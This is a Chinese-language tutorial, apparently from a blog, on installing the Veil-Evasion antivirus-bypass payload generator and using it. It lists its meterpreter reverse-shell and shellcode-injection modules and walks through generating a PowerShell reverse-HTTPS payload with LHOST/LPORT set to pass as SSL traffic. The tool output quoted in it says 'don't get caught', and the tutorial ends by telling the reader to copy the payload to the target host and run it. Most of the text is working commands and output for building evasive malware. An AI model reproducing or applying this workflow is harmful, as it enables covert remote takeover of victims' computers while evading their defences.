Veil是一款绕过杀毒软件的payload生成器,今天我将给大家分享如何安装,安装方法有以下几种,
一、通过建立目录 从Git下载源码安装,源码下载完成,切换到Setup目录,运行bash脚本进行安装,所有过程全部默认即可。
1 2 3 4 | sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil-Evasion.git cd veil-Evasion/ bash setup/setup.sh –s |
二、通过apt-get install 安装
1 | root@kali:/# apt-get install veil |
正在读取软件包列表… 完成
正在分析软件包的依赖关系树
正在读取状态信息… 完成
下列软件包是自动安装的并且现在不需要了:
python-bitarray python-bloomfilter
Use ‘apt-get autoremove’ to remove them.
将会安装下列额外的软件包:
veil-evasion
下列【新】软件包将被安装:
veil veil-evasion
升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 43 个软件包未被升级。
需要下载 5,367 kB 的软件包。
解压缩后会消耗掉 16.5 MB 的额外空间。
您希望继续执行吗?[Y/n]y
获取:1 http://mirrors.ustc.edu.cn/kali/ kali/main veil-evasion amd64 2.20-0kali1 [5,360 kB]
获取:2 http://mirrors.ustc.edu.cn/kali/ kali/main veil amd64 2.20-0kali1 [6,570 B]
下载 5,367 kB,耗时 6秒 (782 kB/s)
Selecting previously unselected package veil-evasion.
(正在读取数据库 … 系统当前共安装有 340231 个文件和目录。)
正在解压缩 veil-evasion (从 …/veil-evasion_2.20-0kali1_amd64.deb) …
Selecting previously unselected package veil.
正在解压缩 veil (从 …/veil_2.20-0kali1_amd64.deb) …
正在设置 veil-evasion (2.20-0kali1) …
正在设置 veil (2.20-0kali1) …
三、启动并简单使得切换至安装目录 ,或者任意终端输入veil 即可运行
列出所有模块:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 | [menu>>]: lists ========================================================================= Veil-Evasion | [Version]: 2.22.1 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Available Payloads: 1) auxiliary/coldwar_wrapper 2) auxiliary/pyinstaller_wrapper 3) c/meterpreter/rev_http 4) c/meterpreter/rev_http_service 5) c/meterpreter/rev_tcp 6) c/meterpreter/rev_tcp_service 7) c/shellcode_inject/flatc 8) cs/meterpreter/rev_http 9) cs/meterpreter/rev_https 10) cs/meterpreter/rev_tcp 11) cs/shellcode_inject/base64_substitution 12) cs/shellcode_inject/virtual 13) go/meterpreter/rev_http 14) go/meterpreter/rev_https 15) go/meterpreter/rev_tcp 16) go/shellcode_inject/virtual 17) native/backdoor_factory 18) native/hyperion 19) native/pe_scrambler 20) powershell/meterpreter/rev_http 21) powershell/meterpreter/rev_https 22) powershell/meterpreter/rev_tcp 23) powershell/shellcode_inject/download_virtual 24) powershell/shellcode_inject/psexec_virtual 25) powershell/shellcode_inject/virtual 26) python/meterpreter/bind_tcp 27) python/meterpreter/rev_http 28) python/meterpreter/rev_http_contained 29) python/meterpreter/rev_https 30) python/meterpreter/rev_https_contained 31) python/meterpreter/rev_tcp 32) python/shellcode_inject/aes_encrypt 33) python/shellcode_inject/aes_encrypt_HTTPKEY_Request 34) python/shellcode_inject/arc_encrypt 35) python/shellcode_inject/base64_substitution 36) python/shellcode_inject/des_encrypt 37) python/shellcode_inject/download_inject 38) python/shellcode_inject/flat 39) python/shellcode_inject/letter_substitution 40) python/shellcode_inject/pidinject 41) ruby/meterpreter/rev_http 42) ruby/meterpreter/rev_http_contained 43) ruby/meterpreter/rev_https 44) ruby/meterpreter/rev_https_contained 45) ruby/meterpreter/rev_tcp 46) ruby/shellcode_inject/base64 47) ruby/shellcode_inject/flat |
[menu>>]: 输入ID选择模块
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | [menu>>]: 21 ========================================================================= Veil-Evasion | [Version]: 2.22.1 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Payload: powershell/meterpreter/rev_https loaded Required Options: Name Current Value Description ---- ------------- ----------- LHOST IP of the Metasploit handler LPORT 8443 Port of the Metasploit handler PROXY N Use system proxy settings Available Commands: set Set a specific option value info Show information about the payload options Show payload's options generate Generate payload back Go to the main menu exit exit Veil-Evasion [powershell/meterpreter/rev_https>>]: |
四、生成Payload我们来设定LHOST和LRORT这两个选项,本例子选择本次局域网中的WindowsXp做为靶机,ip:192.168.34.73 本地端口443(伪装为ssl)所以设定如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | [powershell/meterpreter/rev_https>>]: set LHOST 192.168.34.220 [i] LHOST => 192.168.34.220 [powershell/meterpreter/rev_https>>]: set LPORT 443 [i] LPORT => 443 [powershell/meterpreter/rev_https>>]: generate ========================================================================= Veil-Evasion | [Version]: 2.22.1 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [>] Please enter the base name for output files (default is 'payload'): kali-key Language: powershell Payload: powershell/meterpreter/rev_https Required Options: LHOST=192.168.34.220 LPORT=443 PROXY=N Payload File: /usr/share/veil-output/source/kali-key.bat Handler File: /usr/share/veil-output/handlers/kali-key_handler.rc [*] Your payload files have been generated, don't get caught! [!] And don't submit samples to any online scanner! ;) [>] Press any key to return to the main menu. ========================================================================= Veil-Evasion | [Version]: 2.22.1 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Main Menu 47 payloads loaded Available Commands: use Use a specific payload info Information on a specific payload list List available payloads update Update Veil-Evasion to the latest version clean Clean out payload folders checkvt Check payload hashes vs. VirusTotal exit Exit Veil-Evasion [menu>>]: |
通过将生成的Payload复制到目标主机上进行运行